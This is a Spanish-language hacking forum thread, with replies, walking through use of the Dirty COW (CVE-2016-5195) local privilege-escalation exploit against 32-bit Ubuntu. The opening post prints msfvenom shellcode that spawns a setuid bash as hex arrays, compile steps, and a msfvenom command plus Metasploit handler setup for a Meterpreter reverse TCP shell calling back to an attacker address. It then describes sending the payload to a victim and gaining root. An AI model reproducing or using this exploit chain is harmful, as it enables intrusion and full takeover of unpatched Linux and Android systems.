comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Dirty COW - CVE-2016-5195 explotando vulnerabilidad en el Kernel de Linux

  • 5 Respuestas
  • 3580 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    1.67%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Diciembre 03, 2016, 08:52:01 pm »


Hace aproximadamente un mes, la comunidad linuxera (incluyéndome) se entero de una noticia que simplemente no se podría creer, un fallo de hace 9 años nuevamente estaba presente exponiendo un gran agujero de seguridad en las versiones: Ubuntu 14.04 y Ubuntu 15.10.

las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root por medio de dicho una explotacion local, exponiendo todo el sistema de la victima sin ninguna excepción.

el bug también afecta a todos los dispositivos android de la versión 7 para abajo.

Elevando privilegios de usuario a root en Ubuntu 15.10



Exploit:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Lo primero que debemos hacer ver la fuente del archivo en 40616.c, lo puede hacer en cualquier editor de texto, en mi caso lo abrí por Sublime Text, para que puedan ver lo principal. 



Vemos que el exploit esta generado en msfvenom quiere decir que es un payload.

Este exploit funciona de la siguiente manera, notaron que hay 2 payloads de 64 y 32 bits, por default el de 64bits esta sin comentarios cabe decir que funcionara solamente para esa arquitectura, ya que el de 32 bits esta comentado y no ejercerá ninguna función.


64bits
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;

32bits

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
  0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/

En esta prueba de concepto, estoy exponiendo un sistema "UBUNTU 32BITS", cabe decir que eliminare el payload de 64 bits con todos sus atributos, para quedarme solamente con la arquitectura de 32bits:



ojo: también eh eliminado los comentarios del payloads de 32 bits.

luego de guárdalo pasaremos a compilar el archivo .c

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# gcc 40616.c -o 40616 -pthread


Una ves compilado correctamente, podemos subirlo al servidor de la victima creo que no hay necesidad de pasar a ese proceso ya que existen muchas maneras de hacerlo, si no sabes te invito a buscar los artículos de metasploit framework, en el blog.



Ustedes pueden crear su payload en formato linux, ya que deben hacerlo para poder ejecutar formatos compilados con permisos.



Creando payload en linux 32bits

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=8081 -f elf > /root/Desktop/shell.elf


Estableciendo conexión meterpreter

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf > use multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.35
msf exploit(handler) > set LPORT 8081
msf exploit(handler) > exploit



Entonces le enviaremos nuestro payload a nuestra victima, en el momento que la victima ejecute tendremos su sesión meterpreter:



entramos a terminal y ejecutamos el "Exploit", vemos que se ejecuto correctamente, hemos escalado los privilegios root y por ende tenemos todos los permisos.

Siempre es bueno enseñar pruebas de todo, ejecutaremos el exploit en la misma maquina con un usuario llamado prueba:

./40616



El exploit funciono correctamente, esto fue todo estimados lectores espero les halla encantado este post.
« Última modificación: Diciembre 07, 2016, 02:54:48 am por BrowserNet »

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #1 en: Diciembre 06, 2016, 11:44:20 pm »
Buena data, esto me hace acordar a otro famoso root exploit que cuando salio a ala luz ya tenia años de ser utilizado claro en un circulo cerrado de atacantes que lo tenían hasta que lo liberan (hasta eso ya rootearon miles de servidores) xD.
como recomendación a tu post te diria que quites esa parte que dice: "las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root de manera remota"... ya que a simple vista el exploit tiene que ser ejecutado desde dentro del servidor siendo mas bien un "local root exploit" y quizás esto se preste para confusión.

Saludos!, EPSILON.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #2 en: Diciembre 07, 2016, 02:08:52 am »
Ya la había publicado un post sobre esto :v
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    1.67%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« Respuesta #3 en: Diciembre 07, 2016, 02:53:52 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Buena data, esto me hace acordar a otro famoso root exploit que cuando salio a ala luz ya tenia años de ser utilizado claro en un circulo cerrado de atacantes que lo tenían hasta que lo liberan (hasta eso ya rootearon miles de servidores) xD.
como recomendación a tu post te diria que quites esa parte que dice: "las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root de manera remota"... ya que a simple vista el exploit tiene que ser ejecutado desde dentro del servidor siendo mas bien un "local root exploit" y quizás esto se preste para confusión.

Saludos!, EPSILON.

jejeje, me comi el local root exploit y por una pequeña confusion añadi forma remota, me retracto gracias por su colaboracion mi buen amigo, un saludo y un fuerte abrazo.

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Ya la había publicado un post sobre esto :v

si vi tu post hermano, por eso le quize aumentar las tecnicas de penetracion a un sistema GNU por medio de un payload, para poder ejecutar el root exploit, un saludo mi bro!
« Última modificación: Diciembre 07, 2016, 06:15:34 am por Stiuvert »

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« Respuesta #4 en: Diciembre 08, 2016, 01:29:13 am »
Nuevo local exploit para la version del kernel 4.4.0

No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Dr4g0n4Y

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 1
  • El objetivo es lo imposible
    • Ver Perfil
    • Email
« Respuesta #5 en: Diciembre 26, 2016, 03:44:26 am »
Cuando salió este exploit después de obtener acceso root congelaba la pc víctima haciendo Imposible el uso   , esto ya se corrigió o sigue igual?


 

¿Te gustó el post? COMPARTILO!



Desbordando el buffer en linux x86 (III) [ASLR bypass]

Iniciado por q3rv0

Respuestas: 1
Vistas: 2507
Último mensaje Junio 23, 2015, 11:59:00 am
por roadd
Rootear Servidores Linux By Nort4x

Iniciado por N0rt4x

Respuestas: 9
Vistas: 4101
Último mensaje Septiembre 18, 2012, 05:30:12 pm
por Barym
Rooteando Servidores Linux By:messerschmitt

Iniciado por RooT_Shell

Respuestas: 2
Vistas: 2110
Último mensaje Junio 25, 2010, 08:22:07 pm
por h4ck3r
Desbordando el buffer en linux x86 (II) [NOP Sled]

Iniciado por q3rv0

Respuestas: 2
Vistas: 2161
Último mensaje Septiembre 28, 2014, 12:15:51 pm
por Pr0ph3t
Desbordando el buffer en linux x86 (I)

Iniciado por q3rv0

Respuestas: 0
Vistas: 1857
Último mensaje Septiembre 07, 2014, 09:09:40 pm
por q3rv0